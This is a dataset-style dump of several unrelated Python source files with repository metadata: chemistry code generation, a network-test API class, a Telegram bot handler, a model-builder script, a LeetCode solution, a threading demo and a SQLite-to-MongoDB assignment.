T_C = sqa.term( 1.0, [""], [K_C, sqa.sfExOp([i1,i2])] )
T_A = sqa.term( 1.0, [""], [K_A, sqa.sfExOp([x1,x2])] )
T_V = sqa.term( 1.0, [""], [K_V, sqa.sfExOp([a1,a2])] )
Cin = sqa.tensor("p", [a,b,i,j], [Dsym_c])
Cout = sqa.tensor("Ap", [c,d,k,l], [Dsym_c])
#first excitation
E_aiEbj = sqa.term( 1.0, [""], [Cin, sqa.sfExOp([a, i]) , sqa.sfExOp([b,j])])
E_aiEbj2 = sqa.term( 1.0, [""], [Cout, sqa.sfExOp([l, d]) , sqa.sfExOp([k,c])])
commutator = []
commutator += sqa.commutator(HD_C, E_aiEbj)
commutator += sqa.commutator(HD_A, E_aiEbj)
commutator += sqa.commutator(HD_V, E_aiEbj)
commutator += sqa.commutator(HD_CA1, E_aiEbj)
commutator += sqa.commutator(HD_CA2, E_aiEbj)
commutator += sqa.commutator(HD_CV1, E_aiEbj)
commutator += sqa.commutator(HD_CV2, E_aiEbj)
commutator += sqa.commutator(HD_AV1, E_aiEbj)
commutator += sqa.commutator(HD_AV2, E_aiEbj)
commutator += sqa.commutator(T_C, E_aiEbj)
commutator += sqa.commutator(T_A, E_aiEbj)
commutator += sqa.commutator(T_V, E_aiEbj)
result = []
for t in commutator:
result += sqa.normalOrder(sqa.multiplyTerms(E_aiEbj2, t))
for t in result:
t.contractDeltaFuncs_new()
sqa.removeVirtOps_sf(result)
sqa.termChop(result)
sqa.combineTerms(result)
extendedR=[]
for t in result:
extendedR += sqa.contractCoreOps_sf(t)
for t in extendedR:
t.contractDeltaFuncs_new()
sqa.termChop(extendedR)
sqa.combineTerms(extendedR)
#for t in extendedR:
# print t
#print
result = []
rdmDelta = [deltaC, deltaA, deltaV]
#********this adds delta funcstion when we have repeat indices****************#
for r in extendedR:
result.append(geraldCode.replaceRepeatIndicesWithDeltas(r, rdmDelta))
print "//Number of terms : ", len(result)
print "\tFEqInfo EqsRes[%i] = {\n"%(len(result))
geraldCode.WriteCode_lccSimple(result, AllTensors, CommentKey)
print "\n\t};"
bindex = AllTensors.index("b")
Vindex = AllTensors.index("V")
E1index = AllTensors.index("deltac")
print pDomains
print "\tFEqInfo Overlap[4] = {"
print "\t\t{\"CDKL,LM,CDKM\", 2.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,DCKM\",-1.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,CDMK\",-1.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t\t{\"CDKL,LM,DCMK\", 2.0, 3, {%i, %i, %i}},"%(bindex, E1index, Vindex)
print "\t};"
print "\tstatic void GetMethodInfo(FMethodInfo &Out) {"
print "\t\tOut = FMethodInfo();"
print "\t\tOut.pName = \"MRLCC_CCVV\";"
print "\t\tOut.perturberClass = \"CCVV\";"
print "\t\tOut.pSpinClass = \"restricted\";"
print "\t\tOut.pTensorDecls = &TensorDecls[0];"
print "\t\tOut.nTensorDecls = %i;"%(len(Usage))
print "\t\tOut.pDomainDecls = &DomainDecls[0];"
print "\t\tOut.nDomainDecls = 0;"
print "\t\tOut.EqsRes = FEqSet(&EqsRes[0], %i, \"MRLCC_CCVV/Res\");"%(len(result))
print "\t\tOut.Overlap = FEqSet(&Overlap[0], 4, \"MRLCC_CCVV/Overlap\");"
print "\t};"
print "};"
'''
intmapkey = {"Va" : "nc:", "Vb" : "nc:", "Vc" : "nc:", "Vd" : "nc:", "a" : ":ncore", "b" : ":ncore", "c" : ":ncore", "d" : ":ncore"}
RDMmapkey = {"a" : ":", "b" : ":", "c" : ":", "d" : ":"}
writeCode.WriteCode(extendedR, True, intmapkey, RDMmapkey)
exit(0)
'''
|
[
"bastien.mussard@colorado.edu"
] |
bastien.mussard@colorado.edu
|
27e81b006347dc87e451cca4626b5d9a652d671e
|
1eab574606dffb14a63195de994ee7c2355989b1
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/labelspace_buum91dgvsyw5nzs9sywjlbfnwywnl.py
|
07c893743c85322fac1af7af913f0cc8e9d27226
|
[
"MIT"
] |
permissive
|
steiler/ixnetwork_restpy
|
56b3f08726301e9938aaea26f6dcd20ebf53c806
|
dd7ec0d311b74cefb1fe310d57b5c8a65d6d4ff9
|
refs/heads/master
| 2020-09-04T12:10:18.387184
| 2019-11-05T11:29:43
| 2019-11-05T11:29:43
| 219,728,796
| 0
| 0
| null | 2019-11-05T11:28:29
| 2019-11-05T11:28:26
| null |
UTF-8
|
Python
| false
| false
| 3,341
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LabelSpace(Base):
"""This object configures the labels for the route range.
The LabelSpace class encapsulates a required labelSpace resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = 'labelSpace'
def __init__(self, parent):
super(LabelSpace, self).__init__(parent)
@property
def End(self):
"""The last label value available in the label space (range).
Returns:
number
"""
return self._get_attribute('end')
@End.setter
def End(self, value):
self._set_attribute('end', value)
@property
def LabelId(self):
"""The identifier for the label space.
Returns:
number
"""
return self._get_attribute('labelId')
@LabelId.setter
def LabelId(self, value):
self._set_attribute('labelId', value)
@property
def Mode(self):
"""Sets the Label mode.
Returns:
str(fixedLabel|incrementLabel)
"""
return self._get_attribute('mode')
@Mode.setter
def Mode(self, value):
self._set_attribute('mode', value)
@property
def Start(self):
"""The first label value available in the label space (range). The default is 16.
Returns:
number
"""
return self._get_attribute('start')
@Start.setter
def Start(self, value):
self._set_attribute('start', value)
@property
def Step(self):
"""The value to add for creating each additional label value.
Returns:
number
"""
return self._get_attribute('step')
@Step.setter
def Step(self, value):
self._set_attribute('step', value)
def update(self, End=None, LabelId=None, Mode=None, Start=None, Step=None):
"""Updates a child instance of labelSpace on the server.
Args:
End (number): The last label value available in the label space (range).
LabelId (number): The identifier for the label space.
Mode (str(fixedLabel|incrementLabel)): Sets the Label mode.
Start (number): The first label value available in the label space (range). The default is 16.
Step (number): The value to add for creating each additional label value.
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
self._update(locals())
|
[
"srvc_cm_packages@keysight.com"
] |
srvc_cm_packages@keysight.com
|
0e2bc5af47220d0e776cd4bfd2f23a7afeb398d4
|
789a540bbb79c334cbeaf3687876bfd939e4290b
|
/app/handlers/private/default/message/menu/sellers/show_category_sellers.py
|
db4caa4d7348436fd646cd2e4ad4ab67492dde55
|
[] |
no_license
|
ExissBrr/TRIGON-GARANT-BOT
|
2cc96f5f6f195f4e76c164db4f8acafbfa5b7662
|
812acf060eb92e6fad21568a75e6dba7ce0da4d9
|
refs/heads/main
| 2023-07-04T18:22:43.507453
| 2021-08-17T14:51:30
| 2021-08-17T14:51:30
| 392,725,437
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,427
|
py
|
from aiogram.dispatcher.filters import Command
from aiogram.types import Message
from app import keyboards
from app.data import text
from app.data.types.category_data import ServiceCategoryType
from app.data.types.links import category_link
from app.data.types.seller_data import SellerStatus
from app.loader import dp
from app.utils.db_api.models.sellers import Seller
@dp.message_handler(Command('seller_category'))
async def show_sellers_in_category(message: Message, lang_code):
category_from_args = message.text.split(':')[-1]
await message.delete()
if category_from_args not in ServiceCategoryType.__dict__.values():
await message.answer(
text=text[lang_code].default.message.choose_category_among_list
)
return False
for key, value in ServiceCategoryType.__dict__.items():
if value == category_from_args:
photo_url = category_link[key]
sellers = await Seller.query.where(Seller.status == SellerStatus.ACTIVE).where(
Seller.category == category_from_args).gino.all()
await message.answer_photo(
photo=photo_url,
caption=text[lang_code].default.message.seller_list_in_category.format(category=category_from_args),
reply_markup=await keyboards.default.inline.sellers.show_seller_list_in_category.make_keyboard_sellers_list(
sellers=sellers,
category_name=category_from_args)
)
|
[
"vladbelykh2002@gmail.com"
] |
vladbelykh2002@gmail.com
|
076e2398568768a8a288eeb4e5dd7d351fd1ea99
|
0e1e643e864bcb96cf06f14f4cb559b034e114d0
|
/Exps_7_v3/doc3d/Ablation4_ch016_ep003/Gather3_W_fix3blk_C_change/train/pyr_0s/L4/step09_0side_L4.py
|
f05661764ce1d26fa473aac73bbf00769cf8c4ad
|
[] |
no_license
|
KongBOy/kong_model2
|
33a94a9d2be5b0f28f9d479b3744e1d0e0ebd307
|
1af20b168ffccf0d5293a393a40a9fa9519410b2
|
refs/heads/master
| 2022-10-14T03:09:22.543998
| 2022-10-06T11:33:42
| 2022-10-06T11:33:42
| 242,080,692
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,007
|
py
|
#############################################################################################################################################################################################################
from step08_c_use_G_generate_I_w_M_to_Wx_Wy_Wz_focus_to_Cx_Cy_focus_combine import I_w_M_to_W_to_C
from step08_b_use_G_generate_0_util import Tight_crop, Color_jit
from step09_c_train_step import Train_step_I_w_M_to_W_to_C
from step09_d_KModel_builder_combine_step789 import KModel_builder, MODEL_NAME
color_jit = Color_jit(do_ratio=0.6)
use_gen_op_p20 = I_w_M_to_W_to_C( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 0) ) ### 我目前的 multi_model 的 I_to_Wxyz_to_Cxy_general 是 全部都回傳 Wz_pre_w_M, Wy_pre_w_M, Wx_pre_w_M, Cx_pre_w_M, Cy_pre_w_M, 所以不管 wi/woDIV, Separate 全設 True 就對了
use_train_step_p20 = Train_step_I_w_M_to_W_to_C( separate_out=True, focus=True, tight_crop=Tight_crop(pad_size=20, resize=(255, 255), jit_scale= 15), color_jit=color_jit ) ### 我目前的 multi_model 的 I_to_Wxyz_to_Cxy_general 是 全部都回傳 Wz_pre_w_M, Wy_pre_w_M, Wx_pre_w_M, Cx_pre_w_M, Cy_pre_w_M, 所以不管 wi/woDIV, Separate 全設 True 就對了
from Exps_7_v3.doc3d.Ablation4_ch016_ep003.W_w_M_to_C_pyr.pyr_0s.L4.step09_0side_L4 import *
from Exps_7_v3.doc3d.Ablation4_ch016_ep003.I_w_M_to_W_pyr.pyr_3s.L5.step09_3side_L5 import ch032_pyramid_1side_6__2side_6__3side_6 as I_w_M_to_W_Tcrop255_p20_3s_L5_good
import time
start_time = time.time()
###############################################################################################################################################################################################
#########################################################################################
ch032_pyramid_0side_and_1s6_2s6 = KModel_builder().set_model_name(MODEL_NAME.multi_flow_unet).set_multi_model_builders(op_type="I_to_Wxyz_to_Cxy_general", W_to_Cx_Cy=ch032_pyramid_0side, I_to_Wx_Wy_Wz=I_w_M_to_W_Tcrop255_p20_3s_L5_good).set_multi_model_separate_focus(I_to_W_separ=False, I_to_W_focus=True, W_to_C_separ=False, W_to_C_focus=True).set_gen_op( use_gen_op_p20 ).set_train_step( use_train_step_p20 )
#########################################################################################
###############################################################################################################################################################################################
if(__name__ == "__main__"):
import numpy as np
print("build_model cost time:", time.time() - start_time)
data = np.zeros(shape=(1, 512, 512, 1))
use_model = ch032_pyramid_0side
use_model = use_model.build()
result = use_model.generator(data, Mask=data)
print(result[0].shape)
from kong_util.tf_model_util import Show_model_weights
Show_model_weights(use_model.generator)
use_model.generator.summary()
|
[
"s89334roy@yahoo.com.tw"
] |
s89334roy@yahoo.com.tw
|
cf9a6b4197df455636515613c5824e6d9f7308fb
|
58afefdde86346760bea40690b1675c6639c8b84
|
/leetcode/next-greater-element-iii/282256643.py
|
f2f7254ab8ded0ed13d4530720a51054bf710131
|
[] |
no_license
|
ausaki/data_structures_and_algorithms
|
aaa563f713cbab3c34a9465039d52b853f95548e
|
4f5f5124534bd4423356a5f5572b8a39b7828d80
|
refs/heads/master
| 2021-06-21T10:44:44.549601
| 2021-04-06T11:30:21
| 2021-04-06T11:30:21
| 201,942,771
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 733
|
py
|
# title: next-greater-element-iii
# detail: https://leetcode.com/submissions/detail/282256643/
# datetime: Thu Nov 28 18:18:27 2019
# runtime: 28 ms
# memory: 12.7 MB
import bisect
class Solution:
def nextGreaterElement(self, n: int) -> int:
if n < 10:
return -1
digits = []
while n:
n, d = divmod(n, 10)
if not digits or d >= digits[-1]:
digits.append(d)
else:
i = bisect.bisect(digits, d)
digits[i], d = d, digits[i]
n = n * 10 + d
for d in digits:
n = n * 10 + d
return n if n <= (2 ** 31 - 1) else -1
return -1
|
[
"ljm51689@gmail.com"
] |
ljm51689@gmail.com
|
3a408a86fe1300ed34d82149434b6881b3685bb5
|
80ea03860dedce77e53594472385657bfcd5b6cd
|
/test/test_cons.py
|
963ab07dd3c8c669dd3fa0ffbe02335e985d7c7f
|
[] |
no_license
|
RelationalAI-oss/relationalai-sdk-python
|
434f0531226367d7eccc66ab6c77caafafaa3ce5
|
fdea5fdec84231ae0bb3f2bfd32ed84e962052ae
|
refs/heads/master
| 2023-06-10T01:48:05.624101
| 2021-06-29T15:07:44
| 2021-06-29T15:07:44
| 379,428,666
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 922
|
py
|
"""
Delve Client SDK
This is a Client SDK for Delve API # noqa: E501
The version of the OpenAPI document: 1.1.3
Contact: support@relational.ai
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import rai_api
from rai_api.model.cons_all_of import ConsAllOf
from rai_api.model.linked_list import LinkedList
from rai_api.model.syntax_node import SyntaxNode
globals()['ConsAllOf'] = ConsAllOf
globals()['LinkedList'] = LinkedList
globals()['SyntaxNode'] = SyntaxNode
from rai_api.model.cons import Cons
class TestCons(unittest.TestCase):
"""Cons unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testCons(self):
"""Test Cons"""
# FIXME: construct object with mandatory attributes with example values
# model = Cons() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"helmiinour@gmail.com"
] |
helmiinour@gmail.com
|
9b57f8a69b3a2a57d25b3c849795e6816bdaf79f
|
34cc1aeb6f7d0e612026905d12c85aeea989a83a
|
/host.py
|
ea56c1dc1b3f7bead8cf4ca8fd139af5b8e6233d
|
[] |
no_license
|
mverzett/.bin
|
83de7c0c0c16d75ca39df6c5ed95957f4ec79f9a
|
a1b652f5660c07690f61e79793372ad7e9d6099d
|
refs/heads/master
| 2021-01-18T15:05:42.366559
| 2019-07-11T17:51:05
| 2019-07-11T17:51:05
| 8,330,975
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 755
|
py
|
import os
host = os.environ['HOSTNAME']
public_html = ''
root_dir = ''
web_home = ''
#Site-dependent information
if 'wisc' in host:
public_html = '/afs/hep.wisc.edu/home/%s/public_html/' % os.environ['USER']
root_dir = 'public_html'
web_home = 'http://www.hep.wisc.edu/~mverzett'
elif 'cern.ch' in host:
initial = os.environ['USER'][0]
public_html = '/afs/cern.ch/user/%s/%s/www/' % (initial, os.environ['USER'])
root_dir = 'www'
web_home = 'https://mverzett.web.cern.ch/mverzett'
elif 'fnal.gov' in host:
public_html = os.path.join(os.environ['HOME'],'public_html')
root_dir = 'public_html'
web_home = 'http://home.fnal.gov/~%s' % os.environ['USER']
else:
raise ValueError("Site %s not recongnised!" % host)
|
[
"mverzett@cern.ch"
] |
mverzett@cern.ch
|
c34762a2d3793cb0cfb3c1d72c81137d5420837e
|
663c108dca9c4a30b7dfdc825a8f147ba873da52
|
/venv/multithreading/56InterThreadComEventObjectRemoveConsumerSleep.py
|
b926cace99d531efc0f3c545ed4a68c5d8f0d0b3
|
[] |
no_license
|
ksrntheja/08-Python-Core
|
54c5a1e6e42548c10914f747ef64e61335e5f428
|
b5fe25eead8a0fcbab0757b118d15eba09b891ba
|
refs/heads/master
| 2022-10-02T04:11:07.845269
| 2020-06-02T15:23:18
| 2020-06-02T15:23:18
| 261,644,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
from threading import *
import time
def producer(event):
print("Producer thread producing items:")
print("Producer thread giving notification by setting event")
event.set()
def consumer(event):
print('Consumer sleeping')
time.sleep(3)
print(t1.getName(), 'is active:', t1.isAlive())
print("Consumer thread is waiting for updation")
event.wait()
print("Consumer thread got notification and consuming items")
event = Event()
t1 = Thread(target=producer, args=(event,))
t2 = Thread(target=consumer, args=(event,))
t2.start()
t1.start()
# Consumer sleeping
# Producer thread producing items:
# Producer thread giving notification by setting event
# Thread-1 is active: False
# Consumer thread is waiting for updation
# Consumer thread got notification and consuming items
|
[
"srntkolla@gmail.com"
] |
srntkolla@gmail.com
|
be3ca6a59c8af3295105d05abd669f9eb2c92d43
|
b042a014d668bd2d9e07bcfc756022137e5b0f97
|
/module3-nosql-and-document-oriented-databases/assignment3.py
|
2489aa19f8091748835faafd36ce7732de8ef74d
|
[
"MIT"
] |
permissive
|
JeffreyAsuncion/DS-Unit-3-Sprint-2-SQL-and-Databases
|
82895211b55b08b99e9c9c426f37cb04ba6f57c6
|
5d22fe0e2dd09c4130232b5f17c52e271d9b7f6b
|
refs/heads/master
| 2022-11-24T10:48:13.916529
| 2020-08-01T05:06:58
| 2020-08-01T05:06:58
| 281,016,493
| 0
| 0
| null | 2020-07-20T04:51:39
| 2020-07-20T04:51:39
| null |
UTF-8
|
Python
| false
| false
| 1,557
|
py
|
# Store RPG data in our MongoDB instance
import os
import sqlite3
import pandas as pd
import pymongo
from dotenv import load_dotenv
from pymongo import MongoClient
from pdb import set_trace as breakpoint
#
# Part One: get data from 1. Sqlite or 2. Postgresql
#
DB_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "rpg_db.sqlite3")
connection = sqlite3.connect(DB_FILEPATH)
print("CONNECTION:", connection)
cursor = connection.cursor()
print("CURSOR", cursor)
query = "SELECT * FROM charactercreator_character;"
results = cursor.execute(query).fetchall()
# print("RESULT", results) #> returns cursor object w/o results (need to fetch the results)
# print("type:", type(results))
#
# Prepare df
#
columns = ['character_id', 'name', 'level', 'exp', 'hp', 'strength', 'intelligence', 'dexterity', 'wisdom']
rpg_df = pd.DataFrame(results, columns=columns)
print(rpg_df.head())
#
# TODO: result to dict
#
rpg_dict = rpg_df.to_dict('records')
#
# TODO: create and insert to mongoDB
#
load_dotenv()
DB_USER = os.getenv("MONGO_USER", default="OOPS")
DB_PASSWORD = os.getenv("MONGO_PASSWORD", default="OOPS")
CLUSTER_NAME = os.getenv("MONGO_CLUSTER_NAME", default="OOPS")
connection_uri = f"mongodb+srv://{DB_USER}:{DB_PASSWORD}@{CLUSTER_NAME}.mongodb.net/test?retryWrites=true&w=majority"
print("\n----------------")
print("URI:", connection_uri)
client = pymongo.MongoClient(connection_uri)
#
# TODO: db.collection.insertMany({})
#
db = client.rpg_database
collection = db.charactercreator_character
collection.insert_many(rpg_dict)
|
[
"jeffrey.l.asuncion@gmail.com"
] |
jeffrey.l.asuncion@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.